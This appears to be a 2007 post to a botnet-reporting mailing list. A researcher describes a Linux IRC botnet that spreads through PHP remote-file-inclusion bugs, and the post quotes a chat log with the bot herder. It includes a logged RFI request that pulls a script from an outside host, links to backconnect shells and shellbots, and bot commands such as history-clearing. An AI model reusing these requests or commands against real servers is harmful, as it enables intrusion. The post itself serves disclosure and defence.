To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Hi all,
nice shot Bodik ;] I found different botnet on eu.undernet.org chan #vx8 it's linux zombie based botnet spreads throught various bugs in PHP. Undernet admins please take look on it. Description follows. Botnet herders are Denzel, xeQt, aslpls-. First attempt: 85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79" We mirror all links included, engine for RFI source is not completed yet, so for this time I send row urls. http://nawader.org/modules/Top/kgb.c http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt - PHP shell which includes other links http://nawader.org/modules/Top/bc.txt http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt - Backconnect shell http://nawader.org/modules/Top/n.txt http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt - Shellbot I, connect to eu.undernet.org #vx8 http://nawader.org/modules/Top/teamrx http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt - Loader for n.txt and bc.txt run backconnect and send shell to 220.232.137.199 and 64.38.11.130 http://nawader.org/modules/Top/toyo.txt http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt - Shellbot II, connect to eu.undernet.org #vx8 All scripts are labelled "xeQt vS TeaMrx". Who on chan: http://www.honeynet.cz/trash/list After while on channel bot herders move bots to another chan. #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI #vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi. Here is list from uname -sr. http://www.honeynet.cz/trash/uname chat: <crop> >> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould >> u >> :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal >> :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit << PRIVMSG #vx8 :i now that you are criminal << PRIVMSG #vx8 :but still on free ? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free >> :[EMAIL PROTECTED] PRIVMSG #vx8 :$$ << PRIVMSG xeQt :^AVERSION^A >> :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC >> v6.17 Khaled Mardam-Bey^A >> :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life << PRIVMSG #vx8 :jail is for free >> :[EMAIL PROTECTED] PRIVMSG #vx8 :i know >> :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon << PRIVMSG #vx8 :y are waiting for ? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :its full >> :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months >> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i >> goto wait </crop> <crop> >> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one >> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch >> any of the servers << PRIVMSG #vx8 :when u installed your script throught bug in php that's touching too >> :[EMAIL PROTECTED] PRIVMSG #vx8 ::))) >> :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you >> :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic >> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to >> anything << PRIVMSG #vx8 :yes u did >> :[EMAIL PROTECTED] PRIVMSG #vx8 :no i didn't >> :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my >> job << PRIVMSG #vx8 :and that is ? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass >> spread is? << PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI << PRIVMSG #vx8 :and what about this ? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :so? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip >> address from that? << PRIVMSG #vx8 :this command is better one.. << PRIVMSG #vx8 :<@xeQt> !x uname -sr >> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id >> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor) >> gid=33952(nucsaor) groups=33952(nucsaor) >> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data) >> gid=33(www-data) groups=33(www-data) >> :[EMAIL PROTECTED] PRIVMSG #vx8 :like that? >> :[EMAIL PROTECTED] PRIVMSG #vx8 >> :uid=80(www) gid=80(www) groups=80(www) >> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) >> gid=80(www) groups=80(www) << PRIVMSG #vx8 :yes, now you are in direct connect with these servers .. >> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you >> have no clue man << PRIVMSG #vx8 :thats the point of abuse .. << PRIVMSG #vx8 :these servers are yours ? << PRIVMSG #vx8 :or not ? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your >> pissed off, but this is useless >> :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make >> them trace me... but its useless << PRIVMSG #vx8 :I think that all servers here are used to fraud .. << PRIVMSG #vx8 :i dont think so .. >> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE >> HISTSAVE << PRIVMSG #vx8 :heh >> :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0 >> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you >> get ip from that << PRIVMSG #vx8 :from what ? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac? << PRIVMSG #vx8 :? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac >> :[EMAIL PROTECTED] PRIVMSG #vx8 :man << PRIVMSG #vx8 :what ? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting >> me >> :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds >> :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless >> :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure >> :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont >> say no but.. goood luck << PRIVMSG #vx8 :i'm not hunting you, thats work for authorities. >> :[EMAIL PROTECTED] PRIVMSG #vx8 :yes >> :[EMAIL PROTECTED] PRIVMSG #vx8 :goood >> :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge >> :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge << PRIVMSG #vx8 :so what for now ? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to >> :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you >> the victum.. << PRIVMSG #vx8 :i'm not victim .. >> :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me << PRIVMSG #vx8 :others are victims .. >> :[EMAIL PROTECTED] PRIVMSG #vx8 :your right >> :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop? << PRIVMSG #vx8 :yes << PRIVMSG #vx8 :;] >> :[EMAIL PROTECTED] PRIVMSG #vx8 :and? >> :[EMAIL PROTECTED] NICK :CopKiller >> :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do >> about it? >> :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends, >> girlfriends.... >> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a >> fuck >> :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops << PRIVMSG #vx8 :so kick me dude ;] >> :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to << PRIVMSG #vx8 :heh >> :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill >> show you << PRIVMSG #vx8 :i'm here >> :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood >> :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc </crop> Cheers.. David Vorel _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
